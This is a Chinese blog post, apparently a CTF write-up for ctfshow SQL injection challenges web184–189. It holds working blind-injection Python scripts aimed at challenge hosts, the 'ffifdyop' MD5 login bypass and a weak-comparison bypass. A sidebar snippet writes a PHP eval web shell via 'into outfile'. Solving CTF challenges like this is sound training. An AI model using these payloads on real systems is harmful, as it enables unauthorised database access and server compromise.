ctfshow ,web入门,sql注入题

最新推荐文章于 2024-03-02 12:28:22 发布
最新推荐文章于 2024-03-02 12:28:22 发布
阅读量181 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jie_a/article/details/117386466
版权

芜湖,刚刚考完科目三,又是开始学习的一天

web184

之前的懒得重新写了,
在这里插入图片描述
这里用"right join"右连接来把两个表连接起来进行查询pass字段,后面的单引号可以用16进制编码绕过

RIGHT JOIN(右连接)

用于获取右表所有记录,即使左表没有对应匹配的记录
过滤了where 所以我们用 on
过滤了单引号 所以我们用char(99) =c
char表 :char表
在这里插入图片描述
回显43;
然后我们写个脚本

import requests
url='http://1f6a8d55-3dd2-4924-a125-a22cb98125b5.challenge.ctf.show:8080/select-waf.php'
strflag='{1234567890-qwertyuiopasdfghjklzxcvbnm}'
payload='tableName=ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{},1)regexp(char({})))'
flag=''
for i in range(60):
    if(i<5):
        continue
    for c in range(127):
        data={
            'tableName' : payload.format(str(i),c)
        }
        rep=requests.post(url,data=data)
        if(rep.text.find("$user_count = 22;")>0):
            flag+=chr(c)
            break
    print('正在盲注第{}位'.format(str(i)))
print('flag is ctfshow{}'.format(flag))

在这里插入图片描述
上面的我也不知道哪错了,有大哥路过的话帮俺看看
我又换了种,南方大佬的方法
tableName=ctfshow_user as a right join ctfshow_user as b on b.pass like 0x63746673686f7725
后面是base64编码后的 ctfshow%
like 是匹配带有ctfshow的字段

import requests
import binascii

def to_hex(s):
    # 字符串转16进制
    str_16 = binascii.b2a_hex(s.encode('utf-8'))  
    str_16 = bytes.decode(str_16)
    res = str_16.replace("b'","").replace("'","")
    return res

url = "http://4d223a13-c7d6-4213-9c81-d388a5c26634.challenge.ctf.show:8080/select-waf.php"
str = "0123456789abcdefghijklmnopqrstuvwxyz{}-"
flag = "ctfshow"
for i in range(0,666):
    for j in str:
        result = "0x" + to_hex(flag + j + "%")
        data = {"tableName":"ctfshow_user as a right join ctfshow_user as b on b.pass like {0}".format(result)}
        res = requests.post(url=url, data=data)
        if "$user_count = 43" in res.text:
            flag += j
            print(flag)
            if j=="}":
                exit()
            break

这个OK了
在这里插入图片描述

web185

在这里插入图片描述
把所有数字都ban掉了,但是我学到了绕过方法
在mysql中 true 代表1 true+true 就是2

在这里插入图片描述
在这里插入图片描述
然后我们就可以构造数字了
脚本如下

import requests

def createNum(n):
    str = 'true'
    if n == 1:
        return 'true'
    else:
        for i in range(n - 1):
            str += "+true"
    return str
#把每一个字符转换成ascii码对应的数值
def change_str(s):
    str=""
    str+="chr("+createNum(ord(s[0]))+")"
    for i in s[1:]:
        str+=",chr("+createNum(ord(i))+")"
    return str

url = "http://2a90f1df-1ab5-434c-ac5e-bd9a5fe3aec0.challenge.ctf.show:8080/select-waf.php"
str = "0123456789abcdefghijklmnopqrstuvwxyz{}-"
flag = "ctfshow"
for i in range(0,666):
    for j in str:
        result = change_str(flag + j + "%")
        data = {"tableName":"ctfshow_user as a right join ctfshow_user as b on b.pass like(concat({0}))".format(result)}
        res = requests.post(url=url, data=data)
        if "$user_count = 43;" in res.text:
            flag += j
            print(flag)
            if j=="}":
                exit()
            break

web 186

上一个还能接着用

#-- coding:UTF-8 --
# Author:dota_st
# Date:2021/4/8 21:24
# blog: www.wlhhlc.top
import requests

def createNum(n):
   str = 'true'
   if n == 1:
       return 'true'
   else:
       for i in range(n - 1):
           str += "+true"
   return str

def change_str(s):
   str=""
   str+="chr("+createNum(ord(s[0]))+")"
   for i in s[1:]:
       str+=",chr("+createNum(ord(i))+")"
   return str

url = "http://3044fe6f-042f-49ea-a38c-5806a2404c7f.challenge.ctf.show:8080/select-waf.php"
str = "0123456789abcdefghijklmnopqrstuvwxyz{}-"
flag = "ctfshow"
for i in range(0,666):
   for j in str:
       result = change_str(flag + j + "%")
       #print(result)
       data = {"tableName":"ctfshow_user as a right join ctfshow_user as b on b.pass like(concat({0}))".format(result)}
       res = requests.post(url=url, data=data)
       if "$user_count = 43;" in res.text:
           flag += j
           print(flag)
           if j=="}":
               exit()
           break

web 187

在这里插入图片描述

这次是个输入框,看题可知password 需要进行md5加密
然后我学到了这个字符串 :ffifdyop
他的md5恰好是’or’6�]��!r,��b
可以拼接成select * from admin where password=’‘or’6<乱码>’
不光有ffifdyop 还有129581926211651571912466741651878684928 也可达同样的效果
总之,相当于 select * from admin where password=’'or ture
账号:admin
密码:ffifdyop
flag在返回包中
在这里插入图片描述

web 188

在这里插入图片描述
可以看到是使用用户名查询然后在匹配密码
这里是用了弱比较

if($row['pass']==intval($password)){
      $ret['msg']='登陆成功';

如果个数据库中的用户名都是以字母开头的数据,而以字母开头的数据在和数字比较时,会被强制转换为0,因此就会相等,后面的pass也是一样的道理
但注意,
username=0&password=0
如果有某个数据不是以字母开头,是匹配不成功的,这种情况怎么办,我们可以用||运算符
username=1||1&password=0

web189

用上题的方法不行,看南神博客说用盲注
开局就来个提示,flag在api/index.php中
这次尝试username=0&password=0登录,发现提示密码错误,说明是密码跟上一题不一样了,不是以字母开头的数据。根据提示,flag的位置在一个文件中,可以用load_file来配合regexp来进行盲注

LOAD_FILE(file_name): 读取文件并返回文件内容为字符串。要使用此函数,文件必须位于服务器主机上,必须指定完整路径的文件,而且必须有FILE权限。

regexp: mysql中的正则表达式操作符

容易想到默认路径是/var/www/html/api/index.php,开始写个脚本进行盲注

有问题这个等我整明白再说

web 190-200,再议

盖世大宝剑a
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
herokupro
03-19
Herokupro 项目设置 yarn install 编译和热重装以进行开发 yarn serve 编译并最小化生产 yarn build 整理和修复文件 yarn lint 自定义配置 请参阅。
CTFshow_Web_SQL注入——web171~web190
Ho1aAs‘s Blog
04-08 1813
文章目录web 171web 172web 173web 174web 175web 176web 177web 178web 179web 180-182web 183web 184web 185-186web 187web 188web 189web 190完 web 171 基础 [GET]PAYLOAD: ?id=0' union select 1,2,password from ctfshow_user where username='flag' --+ web 172 过滤 flag
ctfshow学习记录-web入门sql注入181-190)
龟速更新的九某人
09-24 2047
ctfshow学习记录-web入门sql注入web181-web190)
ctfshow学习记录-web入门sql注入191-200)
龟速更新的九某人
01-11 1070
ctfshow学习记录-web入门sql注入web191-web200)
CTFSHOW SQL注入篇(171-190)
羽的博客
06-07 2359
无过滤 前言 下面几道无过滤的都可以写入shell 然后蚁剑连上后从数据库里面找,具体做法如下 id=0' union select 1,"<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php%23" 有的是查询的三项所以payload是 id=0' union select 1,2,"<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php%23" 接着
CTFSHOW web193 left标注盲注脚本
05-04
它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,包括数据库名、表名、列名和 flag 的值。在获取每...
Web安全之SQL注入攻击
03-04
①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖...今天由我给大家带来《web安全之SQL注入篇》系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲:第一讲:“纸上谈兵:我们需要在本地架设注入环境,构
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
Web安全SQL注入精讲视频.zip
04-16
1-1 SQL注入的业务场景以及危害.mp4 1-2 真实网站中的SQL注入是怎么样的.mp4 1-3 SQL为什么有那么多分类.mp4 2-1 整型注入.mp4 2-10 SQL注入读写文件.mp4 2-2 字符型注入(单引号、双引号、括号).mp4 2-3 POST注入....
CTFSHOW-sql注入
Yb_140的博客
08-13 2429
web171 最简单的sql注入,先演示基本操作 payload: -1' union select 1,2,database() --+ //得到数据库名为ctfshow_web -1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web' --+ //得到数据表名为ctfshow_user -1' union select
ctfshow---sql注入(171-213)
fainpo的博客
05-01 679
这里提一句,为什么不直接替换成acb这种,因为,flag原本就有字母,还原的时候会全部都还原成数字的,数字替换成符号应该也是可以的,这边测试了下除了&#好像别的符号都可以。插入查询后查询语句就会变成这样,由于id=11111这是一个不存在的id,而后面1=1又为真,所以会查询到表内所有的内容,--+是注释后面的字符。因为接受username的时候没有用引号,所以接受单纯的数字,而数字和字符比较会转换类型,字符串会变成数字0进行比较,所以相等。
ctfshow(web190-web200)
m0_72125469的博客
12-20 206
ctfshow web190 web191 web192 web193 web194 web195 web196 web197 web198 web199 web200
ctfshow web入门 sql注入(超详解)201-250
qq_50589021的博客
08-23 4450
web201 查询语句 //拼接sql语句查找指定ID用户 $sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';"; 返回逻辑 //对传入的参数进行了过滤 function waf($str){ //代码过于简单,不宜展示 } 需要学会: 使用--user-agent 指定agent --user-agent="Mozilla/5
[CTFSHOW][WEB入门] SQL注入
fallingskies
10-07 933
web171 参数类型 字符型 SQL语句 SELECT 注入方式 回显注入 查询语句 //拼接sql语句查找指定ID用户 $sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;"; # 确定回显列数 -1' union select NULL,NULL,NULL--+ # 查询当...
ctfshow web入门 sql注入记录
ashMOB的博客
11-12 1030
ctfshow web入门 sql注入 前言,感谢y4师傅详尽的教程[CTFSHOW]SQL注入(WEB入门)_Y4tacker的博客-CSDN博客_ctfshow sql注入 sql注入的产生: php中对数据库的操作非常简化,只需要一串sql语句的字符串,之后将这个字符串传入mysql_query这个函数就能进行数据库的操作,因而如果对用户传入的参数不进行严格的过滤,或者通过预处理之类的手段严格限制传入的参数,就会造成sql注入漏洞,执行用户自定义的sql语句。 MySQL5注入的一般流程: 获取字
CTFshow web入门 sql web188-246
Je3Z的博客
04-15 1984
web188 在where username=0这样的查询中,因为username都会是字符串,在mysql中字符串与数字进行比较的时候,以字母开头的字符串都会转换成数字0,因此这个where可以把所有以字母开头的数据查出来。 而password=0的原因在于这里: if($row['pass']==intval($password)){ 没错。。。弱类型比较,看来查出来的pass也都是以字母开头的,所以password=0可以成功弱类型比较,得到flag。 ...
ctfshow- sql注入(web入门
..
11-19 1595
web174 这道可以先在查询框中随便查询1或2或3,发现没有回显,猜测一下可能是盲注。 首先用bp抓包试一下,得到关键信息 http://f5096abc-7db4-4448-8da0-fccd604899d9.challenge.ctf.show/api/v3.php?id=11&page=1&limit=10 用脚本尝试一下没有回显信息,根据前面的经验,这是第四尝试改为v4.php?id=1,发现出现回显信息。 我们可以这样写脚本 import r.
CTFSHOW -SQL 注入
m0_64180167的博客
11-13 579
重新来做一遍 争取不看wp。
ctfshow--sql注入
最新发布
qq_74240553的博客
03-02 874
ctfshow--sql
ctfshow web入门 sql注入
03-17
SQL注入是一种常见的网络安全漏洞,它通过提交非法的SQL语句来欺骗Web应用程序,访问或修改数据库中的数据。通过在Web应用程序的输入字段中插入恶意代码,攻击者可以绕过安全措施并获得不应该拥有的敏感信息。为了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值